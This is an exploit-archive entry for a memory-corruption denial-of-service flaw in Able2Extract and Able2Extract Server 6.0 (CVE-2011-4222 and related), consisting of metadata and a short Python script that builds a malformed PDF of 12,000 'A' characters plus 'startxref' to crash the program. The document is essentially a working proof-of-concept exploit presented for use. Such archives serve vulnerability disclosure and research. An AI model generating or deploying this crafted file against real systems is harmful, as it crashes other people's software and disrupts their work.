Able2Extract and Able2Extract Server 6.0 - Memory Corruption
Author: Carlos Mario Penagos Hollmann type: dos platform: windows port: date_added: 2012-06-25 date_updated: 2012-06-25 verified: 1 codes: CVE-2011-4222;CVE-2011-4221;CVE-2011-4220;OSVDB-76849 tags: aliases: screenshot_url: application_url: raw file: 19392.py
# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory Corruption # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: www.investintech.com # Version:6.0 # Tested on: Windows 7 # CVE : cve-2011-4222 payload ="A"*12000 crash="startxref" pdf=payload+crash filename = "slimpdPoC.pdf" file = open(filename,"w") file.writelines(pdf) file.close()